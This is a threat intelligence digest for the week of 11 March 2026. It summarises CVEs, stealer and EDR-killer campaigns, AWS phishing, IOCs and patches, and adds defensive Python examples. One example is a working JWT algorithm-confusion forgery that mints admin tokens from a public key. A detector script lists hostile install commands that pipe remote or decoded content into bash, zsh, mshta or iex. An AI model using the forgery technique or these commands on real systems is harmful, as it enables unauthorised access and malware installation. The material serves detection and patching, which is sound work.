Cyber Threat Intelligence Digest: Week 10

11th March 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Threat Actors Exploit WordPress Plugin Vulnerability CVE-2026-1492 to Create Administrator Accounts Without Authentication - On 3 March 2026, Wordfence updated its advisory regarding a critical vulnerability, tracked as CVE-2026-1492, in the User Registration & Membership plugin (versions 5.1.2 and earlier) and warned that threat actors had begun exploiting it. According to Wordfence telemetry, 78 exploitation attempts were blocked within a recent 24-hour period.

The vulnerability is caused by improper privilege management. The plugin accepts a user-supplied role during membership registration but fails to enforce a server-side allowlist. If exploited successfully, unauthenticated attackers can create administrator accounts and gain full control of the affected WordPress site. The plugin developer addressed the issue in version 5.1.3 and subsequently released version 5.1.4.
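The defect described above, as an added example that is not the plugin's code (written in Python so that the digest's examples share one language; the same allowlist logic applies in the plugin's PHP): the request-supplied role handled naively beside a server-side allowlist, plus an audit that finds the outcome of exploitation, administrator accounts that are not in a known-good baseline. The allowlist contents, role names and user records are constructed for the example.

```python
"""Added example (not the plugin's code): client-supplied role versus a
server-side allowlist, and an audit for unexpected administrator accounts.
The allowlist, role names and user records are constructed assumptions."""
from datetime import datetime

# Roles self-service registration may assign (assumption for the example).
REGISTRABLE_ROLES = {"subscriber", "member"}
DEFAULT_ROLE = "subscriber"


def assign_role_vulnerable(form):
    """The pattern the advisory describes: the role comes straight from
    the request body, so role=administrator is honoured."""
    return form.get("role", DEFAULT_ROLE)


def assign_role_hardened(form):
    """Server-side allowlist: anything not explicitly registrable falls
    back to the default role, regardless of what the client sent."""
    requested = form.get("role", DEFAULT_ROLE)
    return requested if requested in REGISTRABLE_ROLES else DEFAULT_ROLE


def find_unexpected_admins(users, baseline_admins, since):
    """Flag administrator accounts that are not in the known-good baseline
    and were registered on or after `since` (ISO 8601). `users` are dicts
    shaped like rows joined from wp_users and the capabilities meta."""
    cutoff = datetime.fromisoformat(since)
    return [
        u["user_login"]
        for u in users
        if "administrator" in u["roles"]
        and u["user_login"] not in baseline_admins
        and datetime.fromisoformat(u["user_registered"]) >= cutoff
    ]


# Constructed sample data: one legitimate admin, one created via the bypass.
SAMPLE_USERS = [
    {"user_login": "siteowner", "roles": ["administrator"],
     "user_registered": "2023-05-01T09:00:00"},
    {"user_login": "jane", "roles": ["subscriber"],
     "user_registered": "2026-03-02T11:15:00"},
    {"user_login": "support_team", "roles": ["administrator"],
     "user_registered": "2026-03-04T02:13:47"},
]

if __name__ == "__main__":
    attacker_form = {"user_login": "support_team", "role": "administrator"}
    print("vulnerable assigns:", assign_role_vulnerable(attacker_form))
    print("hardened assigns:  ", assign_role_hardened(attacker_form))
    print("unexpected admins: ", find_unexpected_admins(
        SAMPLE_USERS, {"siteowner"}, "2026-02-01T00:00:00"))
```

Run the audit against an export of the site's users after patching; any hit means the site should be treated as compromised (rotate credentials, review installed plugins and files) rather than simply deleting the account.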

pac4j-jwt Patches Authentication Bypass Vulnerability (CVE-2026-29000) - On 3 March 2026, CodeAnt AI disclosed details and a proof-of-concept exploit for CVE-2026-29000, a critical authentication bypass vulnerability affecting pac4j-jwt in versions prior to 4.5.9, 5.7.9, and 6.3.3. pac4j-jwt is a Java library that provides JSON Web Token authentication for applications.

Successful exploitation allows a threat actor who holds the server's RSA public key (which, being public, must be assumed available to anyone) to forge JSON Web Tokens that pass signature verification, and so to authenticate as any user, including those with elevated privileges. The vendor addressed the vulnerability in versions 4.5.9, 5.7.9, and 6.3.3; there were no reports of active exploitation at the time of writing.
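The digest does not describe the mechanism behind CVE-2026-29000. As an added example, not pac4j-jwt's code, the block below shows the general pattern by which knowing only an RSA public key is enough to forge a token: a verifier that lets the token's own "alg" header choose the primitive and feeds its single configured key into whichever primitive that is, beside a verifier that pins the algorithm. The toy RSA (textbook, no padding, small demo key) exists only so the block runs offline and must not be used for real signing; the key serialisation in public_key_bytes stands in for the PEM or JWK a real server would load.

```python
"""Added example (not pac4j-jwt code): algorithm-trusting versus
algorithm-pinned JWT verification. Toy RSA is for the demo only."""
import base64, hashlib, hmac, json, math, random


def _is_probable_prime(n, rounds=24):
    """Miller-Rabin; adequate for a demo key, not for production."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits=320):
    """n must exceed 2**256 so a SHA-256 digest fits as the RSA 'message'."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return {"n": p * q, "e": e}, {"n": p * q, "d": pow(e, -1, phi)}


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _digest_int(signing_input):
    return int.from_bytes(hashlib.sha256(signing_input).digest(), "big")


def public_key_bytes(public_key):
    """Stand-in for the PEM/JWK bytes a server loads; an attacker can
    reproduce them exactly because a public key is public."""
    return json.dumps(public_key, sort_keys=True).encode()


def _encode(alg, claims):
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    return header, payload, f"{header}.{payload}".encode()


def issue_rs256(claims, private_key):
    """Legitimate issuer: RSA over SHA-256(header.payload)."""
    header, payload, signing_input = _encode("RS256", claims)
    sig = pow(_digest_int(signing_input), private_key["d"], private_key["n"])
    nbytes = (private_key["n"].bit_length() + 7) // 8
    return f"{header}.{payload}.{_b64url(sig.to_bytes(nbytes, 'big'))}"


def forge_hs256_with_public_key(claims, public_key):
    """Attacker: HMAC the token using the public key bytes as the secret."""
    header, payload, signing_input = _encode("HS256", claims)
    mac = hmac.new(public_key_bytes(public_key), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(mac)}"


def _split(token):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), f"{h}.{p}".encode(), _b64url_decode(s), json.loads(_b64url_decode(p))


def _rsa_ok(signing_input, sig, public_key):
    return pow(int.from_bytes(sig, "big"), public_key["e"], public_key["n"]) == _digest_int(signing_input)


def verify_trusting_header(token, public_key):
    """Vulnerable pattern: the token picks the algorithm and the server's
    one configured key is used whichever algorithm that is."""
    header, signing_input, sig, claims = _split(token)
    if header.get("alg") == "RS256":
        ok = _rsa_ok(signing_input, sig, public_key)
    elif header.get("alg") == "HS256":
        expected = hmac.new(public_key_bytes(public_key), signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, sig)
    else:
        ok = False
    return claims if ok else None


def verify_pinned(token, public_key, expected_alg="RS256"):
    """Hardened: the algorithm is server configuration, not token input,
    and RSA key material is never handed to an HMAC."""
    header, signing_input, sig, claims = _split(token)
    if header.get("alg") != expected_alg:
        return None
    return claims if _rsa_ok(signing_input, sig, public_key) else None


if __name__ == "__main__":
    pub, priv = generate_keypair()
    good = issue_rs256({"sub": "alice", "role": "user"}, priv)
    forged = forge_hs256_with_public_key({"sub": "admin", "role": "admin"}, pub)
    print("legit,  trusting verifier:", verify_trusting_header(good, pub))
    print("forged, trusting verifier:", verify_trusting_header(forged, pub))
    print("forged, pinned verifier:  ", verify_pinned(forged, pub))
```

The practical check for any JWT library in use is the same as the pinned verifier: confirm that the accepted algorithm is fixed in configuration, that an RSA or EC key is never usable as an HMAC secret, and that a token with a different "alg" (or "none") is rejected before any key is touched.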

IBM Patches Information Disclosure Vulnerability CVE-2025-36105 Affecting IBM Planning Analytics Advanced Certified Containers - On 6 March 2026, IBM patched an information disclosure vulnerability tracked as CVE-2025-36105, affecting IBM Planning Analytics Advanced Certified Containers versions 3.1.0 to 3.1.4. Exploitation of the vulnerability could allow threat actors to obtain sensitive information from environment variables. At the time of writing, there are no reports of this vulnerability being exploited in the wild.

To mitigate the risk of exploitation, Insikt Group recommends updating IBM Planning Analytics Advanced Certified Containers to version 3.1.5.

Potential Threats

Threat Actor Targets HR and Recruitment Personnel With Resume-Themed ISO Lures Delivering BlackSanta EDR Killer Module - On 10 March 2026, Aryaka Threat Labs reported a resume-themed malware campaign targeting human resources and recruitment personnel. The campaign deployed BlackSanta, an endpoint detection and response killer module that terminates security tools before downloading additional executables from threat actor-controlled command-and-control infrastructure. Aryaka noted the campaign had been active for over a year and linked it to a Russian-speaking threat actor based on language cues and code artifacts.

The threat actor distributed ISO files via spearphishing links on cloud storage services. When a user executed a PDF-themed Windows shortcut, a hidden PowerShell instance ran, extracting data from a PNG file using steganography. This downloaded a ZIP archive containing a legitimate SumatraPDF executable and a malicious DWrite.dll, triggering DLL sideloading. The malware fingerprinted the host, communicated with a C2 server for AES keys, validated the environment, disabled Windows Defender protections, and queried memory integrity. It pulled additional executables from multiple C2 endpoints and used BlackSanta to gain kernel-level access and terminate security processes.

Threat Actors Employ Malvertising to Distribute Amatera Stealer via InstallFix Technique - On 6 March 2026, Push Security published an analysis of a malvertising campaign using “InstallFix” to distribute the Amatera Stealer malware via cloned installation pages for Anthropic’s Claude Code command-line interface tool. InstallFix involves replicating legitimate software installation pages and replacing trusted copy-and-paste commands with malicious ones that execute malware when run. Claude Code is a command-line AI coding assistant for developers and non-technical users. The campaign abused trusted “curl to bash” installation patterns, modifying legitimate commands to fetch payloads from threat actor-controlled infrastructure.

Threat actors cloned the official Claude Code installation page, hosted it on lookalike domains, and promoted them via Google Ads targeting searches like “Claude Code” and “Claude Code CLI.” Victims landing on these replica sites saw standard installation instructions, but the commands retrieved content from malicious domains instead of the legitimate claude.ai. On Windows, executing the command launched mshta.exe to fetch and run remote script content, supported by conhost.exe. On macOS, the command decoded a Base64 string, decompressed a payload, and ran it via Z Shell, which then downloaded a secondary binary to /tmp/ for execution. At the time of writing, the malicious domains and URLs returned error messages.
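A pre-paste check for the InstallFix pattern described above, as an added example that is not Push Security's tooling: it extracts the hosts an install command fetches from and compares them with the vendor's allowlisted host, flags a launch through mshta, and flags a pipeline that decodes or decompresses a blob and feeds it to a shell. claude.ai is the only host the digest names as legitimate; the allowlist, the sample commands, their paths and the lookalike hosts are constructed for the example.

```python
"""Added example (not Push Security's tooling): flag InstallFix-style
install commands before they are pasted into a terminal. Allowlist and
sample commands are constructed assumptions."""
import re
import shlex
from urllib.parse import urlsplit

TRUSTED_HOSTS = {"claude.ai"}  # per-tool allowlist (assumption for the example)

_URL = re.compile(r"""https?://[^\s'"|;&)]+""", re.I)
_SHELLS = {"sh", "bash", "zsh", "dash", "ksh", "powershell", "powershell.exe", "pwsh"}
_DECODERS = {"base64", "gzip", "gunzip", "zcat", "xxd", "openssl"}


def _trusted(host, trusted):
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in trusted)


def check_install_command(command, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    for url in _URL.findall(command):
        host = urlsplit(url).hostname or ""
        if not _trusted(host, trusted_hosts):
            findings.append(f"fetches from untrusted host {host}")
    # Split the pipeline on | || && ; and look at each stage's first word.
    stage_cmds = []
    for stage in re.split(r"\|\|?|&&|;", command):
        try:
            words = shlex.split(stage.strip())
        except ValueError:
            words = stage.split()
        stage_cmds.append(words[0].lower() if words else "")
    if any(c in ("mshta", "mshta.exe") for c in stage_cmds):
        findings.append("launches mshta to run remote script content")
    if stage_cmds[-1] in _SHELLS and any(c in _DECODERS for c in stage_cmds[:-1]):
        findings.append("pipes decoded/decompressed data into a shell")
    if re.search(r"\b(?:iex|invoke-expression)\b", command, re.I):
        findings.append("evaluates downloaded text with Invoke-Expression")
    return findings


# Constructed samples: the shapes the digest describes, with made-up hosts.
SAMPLE_COMMANDS = {
    "legit": "curl -fsSL https://claude.ai/install.sh | bash",
    "cloned": "curl -fsSL https://claude-code-cli.example/install.sh | bash",
    "macos": "echo SGVsbG8= | base64 -d | gunzip | zsh",
    "windows_hta": "mshta https://claude-code-setup.example/run.hta",
    "windows_ps": "irm https://claude-code-setup.example/install.ps1 | iex",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        print(f"{name}: {check_install_command(cmd) or 'no findings'}")
```

The allowlist is what lets the genuine command through; "curl to bash" is trust in the host by construction, so the check is only as good as the list of hosts a team has decided to trust for each tool.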

Threat Actors Conduct AitM Phishing Campaign Targeting AWS Management Console Credentials - On 9 March 2026, Datadog Security Research disclosed an active adversary-in-the-middle phishing campaign targeting Amazon Web Services Management Console credentials, first observed on 23 and 25 February 2026. The campaign used typosquatted domains that mimicked AWS naming conventions and shared registrar metadata across multiple infrastructure clusters. In one documented case, a threat actor accessed a compromised AWS account around 20 minutes after credentials were submitted, logging in via a VPN exit node. Datadog reported the campaign was still active at the time of publication, noting infrastructure changes on 26 February 2026.

The threat actors sent emails posing as AWS security messages, referencing unusual cross-account activity involving an Identity and Access Management role. Victims were redirected through several URLs, including an AWS SES click-tracking link, before reaching a counterfeit AWS sign-in page. The AitM kit acted as an intermediary, forwarding submitted credentials to the legitimate AWS service in real time and relaying responses back to the victim. The phishing pages also mirrored AWS’s OAuth sign-in flow, including PKCE parameters and AWS-hosted assets and styling, and Datadog observed an exposed management interface for the kit on TCP port 3000 used for campaign administration.

General News

Microsoft Teams will tag third-party bots trying to join meetings - Microsoft has announced that Teams will soon automatically tag third-party bots in meeting lobbies, giving organisers control over whether they can join. The feature, currently in development, is scheduled for rollout in May 2026 and will be available across Windows, macOS, Android, and iOS for standard multi-tenant and GCC cloud environments. Once implemented, external bots attempting to join a Teams meeting will be clearly labelled in the lobby, requiring organisers to explicitly allow them to enter rather than being admitted alongside human participants.

This change is designed to prevent malicious apps or third-party bots used for tasks such as note-taking or transcription from joining meetings without attendees’ knowledge. Microsoft stated that organisers will see a clear representation of bots in the lobby and must admit them separately, ensuring full control over non-human participants. Teams has also introduced other security features, including a call reporting function for flagging suspicious or unwanted calls, warnings about external callers impersonating trusted organisations, and the ability for admins to block external users through the Defender portal to prevent social engineering and ransomware attacks.

FBI investigates breach of surveillance and wiretap systems - The U.S. Federal Bureau of Investigation (FBI) confirmed on Thursday that it is investigating a breach affecting systems used to manage surveillance and wiretap warrants. The agency stated that it identified and addressed suspicious activity on its networks and has employed all available technical capabilities to respond, but declined to provide further details regarding the scope or impact of the incident. CNN, which first reported the breach, cited an anonymous source indicating that the compromised systems are involved in managing wiretapping and foreign intelligence surveillance warrants.

It is currently unclear whether this incident is linked to previous attacks, including those by the Chinese state-backed threat group Salt Typhoon, which in 2024 compromised U.S. federal systems used for court-authorised network wiretapping requests. Salt Typhoon also breached the networks of multiple U.S. telecommunications providers and international carriers, gaining access to private communications of some U.S. government officials. The FBI has faced prior cyber incidents, including a 2021 email server hack used to distribute spam impersonating the bureau and a 2023 investigation into malicious activity involving a New York Field Office system used for child sexual exploitation investigations.

Fake LastPass support email threads try to steal vault passwords - Password management provider LastPass is warning users of a phishing campaign targeting its customers with fake alerts about unauthorized account access. The emails impersonate LastPass representatives, often spoofing the display name and using subject lines designed to look like forwarded internal conversations regarding requests to change the account’s primary email address. Recipients are urged to respond quickly and click links such as “report suspicious activity,” “disconnect and lock vault,” and “revoke device,” which lead to a fake login page hosted on the domain “verify-lastpass[.]com” to capture credentials.

According to LastPass Threat Intelligence, Mitigation, and Escalation (TIME), attackers also use slightly altered URLs that redirect to the same phishing page. Multiple sender addresses and subject lines are employed to appear credible, often using compromised or abandoned domains while hiding behind the ‘LastPass Support’ display name. LastPass emphasised that its systems have not been compromised and reminded users that support agents will never request their master password. The company is working with partners to take down the fake sites and urges users to report suspicious communications to abuse@lastpass.com. Earlier campaigns this year and in late 2025 used fake maintenance notices, user death claims, and false hack alerts to target users.


Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and together determine the group's severity. This week's changes are shown below.

Severity scale: Limited Severity | Basic Severity | Moderate Severity | High Severity

Threat Actor                Severity (previous -> current)   Opportunity (previous -> current)   Intent (previous -> current)
HAFNIUM                     Moderate -> Moderate             59 -> 55                            25 -> 25
Secp0 Ransomware Group      NEW -> Basic                     NEW -> 25                           NEW -> 40
Saparr                      NEW -> Basic                     NEW -> 30                           NEW -> 25
AiLock Ransomware Group     Basic -> Basic                   25 -> 25                            5 -> 31
BianLian Ransomware Group   Basic -> Basic                   40 -> 35                            35 -> 25

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers            Methods      Vulnerabilities   Targets
Iranian Hackers      Ransomware   CVE-2025-26399    Hebrew Academy
Handala Hack Team    PlugX        CVE-2025-59718    Consulting
Army Air Force       Coruna       CVE-2026-1603     WhatsApp
Lazarus Group        Stealware    CVE-2025-49113    McKiney & Company
ShinyHunters         Dindoor      CVE-2026-21262    Signal

Prominent Information Security Events

Threat Actor Targets HR and Recruitment Personnel With Resume-Themed ISO Lures Delivering BlackSanta EDR Killer Module

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66

IOC: IP - 157[.]250[.]202[.]215

On 10 March 2026, Aryaka Threat Labs reported a resume-themed malware campaign targeting human resources and recruitment personnel. The campaign deployed BlackSanta, an endpoint detection and response killer module that disables security tools before downloading additional executables from threat actor-controlled command-and-control infrastructure. Aryaka noted that the campaign had been active for over a year and attributed it to a Russian-speaking threat actor based on Russian-language comments and related code artifacts.

The attackers distributed ISO files via spearphishing links and hosted them on cloud storage services. When a user mounted the ISO and executed a PDF-themed Windows shortcut, a hidden PowerShell instance ran with an execution policy bypass, extracting embedded data from a PNG file using least significant bit steganography. The script then downloaded a ZIP archive containing a legitimate SumatraPDF executable and a malicious DWrite.dll, triggering DLL sideloading when the trusted executable loaded the local DLL. The malicious DLL fingerprinted the host, sent the data to a command-and-control endpoint, and received AES key material to enable runtime string decryption.

Once communications with the C2 server were established, the malware validated the environment by checking host and user identifiers, locale, virtualization artifacts, and debugger indicators. It modified Windows Defender SpyNet registry keys to disable cloud protection and automatic sample submission and checked the Hypervisor-Enforced Code Integrity registry value to determine whether Memory Integrity was enabled. The malware tracked execution state through registry values and environment variables, pulled additional executables from multiple C2 endpoints, and launched them using process hollowing. BlackSanta further loaded vulnerable drivers, including RogueKiller Antirootkit and IObitUnlocker.sys, to gain kernel-level access and terminate security and monitoring processes from a hard-coded list.

Threat Actors Conduct AitM Phishing Campaign Targeting AWS Management Console Credentials

Source: Insikt Group | Validated Intelligence Event

IOC: Domain - signin[.]aws[.]cloud-recovery[.]net

IOC: IP - 185[.]209[.]196[.]132

On 9 March 2026, Datadog Security Research disclosed an active adversary-in-the-middle phishing campaign targeting Amazon Web Services Management Console credentials, first observed on 23 and 25 February 2026. The campaign relied on typosquatted domains that mimicked AWS naming conventions and shared registrar metadata across multiple infrastructure clusters. In one documented case, a threat actor accessed a compromised AWS account approximately 20 minutes after credentials were submitted, signing in via a VPN exit node. Datadog reported that the campaign remained active at the time of publication and observed infrastructure changes on 26 February 2026.

The attackers sent emails posing as AWS security alerts, referencing unusual cross-account activity involving an Identity and Access Management role. The embedded links redirected victims through multiple URLs, including an AWS Simple Email Service click-tracking link, before delivering a counterfeit AWS sign-in page. The adversary-in-the-middle kit functioned as an intermediary, forwarding submitted credentials to the legitimate AWS sign-in service in real time and relaying responses back to the victim’s browser.

The phishing pages also replicated AWS’s OAuth sign-in flow, including Proof Key for Code Exchange (PKCE) parameters such as code_challenge with code_challenge_method=SHA-256, and used AWS-hosted assets and styling to closely mirror the official login page. Datadog additionally observed an exposed management interface for the kit on TCP port 3000, which was used to administer the campaign.
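A hunt for the follow-on access described in the Potential Threats summary and the event write-up above, as an added example that is not Datadog's detection content. It correlates a web-proxy hit on the published phishing domain with CloudTrail ConsoleLogin events: a login from the kit's own IP (the relayed session) or a successful login by the same user, from an IP outside that user's known set, within a window after the visit (the attacker's later VPN sign-in). The two IOC values are the ones the digest lists, undefanged for matching; the log records, usernames, IPs, the 60-minute window and the known-IP baseline are constructed assumptions.

```python
"""Added example (not Datadog's content): correlate a proxy hit on the
phishing domain with CloudTrail ConsoleLogin events. IOCs are the two
values the digest lists; all log records are constructed assumptions."""
from datetime import datetime, timedelta

PHISHING_HOSTS = {"signin.aws.cloud-recovery.net"}
PHISHING_IPS = {"185.209.196.132"}


def _t(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def successful_console_logins(events):
    """Yield (time, user, source IP, MFAUsed) for successful ConsoleLogin records."""
    for ev in events:
        if ev.get("eventName") != "ConsoleLogin":
            continue
        if ev.get("responseElements", {}).get("ConsoleLogin") != "Success":
            continue
        user = ev["userIdentity"].get("userName") or ev["userIdentity"].get("arn")
        mfa = ev.get("additionalEventData", {}).get("MFAUsed", "No")
        yield _t(ev["eventTime"]), user, ev["sourceIPAddress"], mfa


def hunt_aitm_followup(proxy_logs, cloudtrail, known_ips, window_minutes=60):
    """Alerts for logins from the phishing infrastructure itself, and for
    new-IP logins by a user who visited a phishing host shortly before.
    AitM relays MFA, so MFAUsed=Yes is reported but not used to exclude."""
    alerts = []
    visits = [(_t(p["ts"]), p["user"]) for p in proxy_logs if p["host"].lower() in PHISHING_HOSTS]
    window = timedelta(minutes=window_minutes)
    for when, user, ip, mfa in successful_console_logins(cloudtrail):
        if ip in PHISHING_IPS:
            alerts.append(f"{user}: ConsoleLogin from phishing infrastructure {ip} at {when.isoformat()}")
            continue
        for visit_at, victim in visits:
            if victim == user and visit_at <= when <= visit_at + window and ip not in known_ips.get(user, set()):
                minutes = int((when - visit_at).total_seconds() // 60)
                alerts.append(f"{user}: new-IP ConsoleLogin from {ip} {minutes} min after phishing visit (MFAUsed={mfa})")
    return alerts


# Constructed logs: one victim who hit the phishing page, one unaffected user.
PROXY_LOGS = [
    {"ts": "2026-02-25T09:02:10Z", "user": "ops-admin", "host": "signin.aws.cloud-recovery.net"},
    {"ts": "2026-02-25T09:05:00Z", "user": "dev-bob", "host": "console.aws.amazon.com"},
]
CLOUDTRAIL = [
    {"eventName": "ConsoleLogin", "eventTime": "2026-02-25T09:02:41Z",
     "sourceIPAddress": "185.209.196.132",
     "userIdentity": {"type": "IAMUser", "userName": "ops-admin"},
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "Yes"}},
    {"eventName": "ConsoleLogin", "eventTime": "2026-02-25T09:22:30Z",
     "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "IAMUser", "userName": "ops-admin"},
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "Yes"}},
    {"eventName": "ConsoleLogin", "eventTime": "2026-02-25T09:06:00Z",
     "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"},
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "Yes"}},
]
KNOWN_IPS = {"ops-admin": {"203.0.113.10"}, "dev-bob": {"203.0.113.10"}}

if __name__ == "__main__":
    for line in hunt_aitm_followup(PROXY_LOGS, CLOUDTRAIL, KNOWN_IPS):
        print(line)
```

Because the kit relays the real sign-in, the first successful login lands in CloudTrail with the kit's source IP while the victim's own browser never reaches AWS; the second, later login from an unfamiliar IP is the one the digest describes as roughly twenty minutes after submission.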

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable: 

  • CVE-2026-1492 (WordPress) – This vulnerability can be addressed by updating the User Registration & Membership plugin to version 5.1.3 or later.
  • CVE-2026-29000 (pac4j-jwt) – This vulnerability can be remediated by updating to version 4.5.9, 5.7.9, or 6.3.3, whichever corresponds to the major version in use.
  • CVE-2025-36105 (IBM Containers) – This vulnerability can be addressed by updating IBM Planning Analytics Advanced Certified Containers to version 3.1.5.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.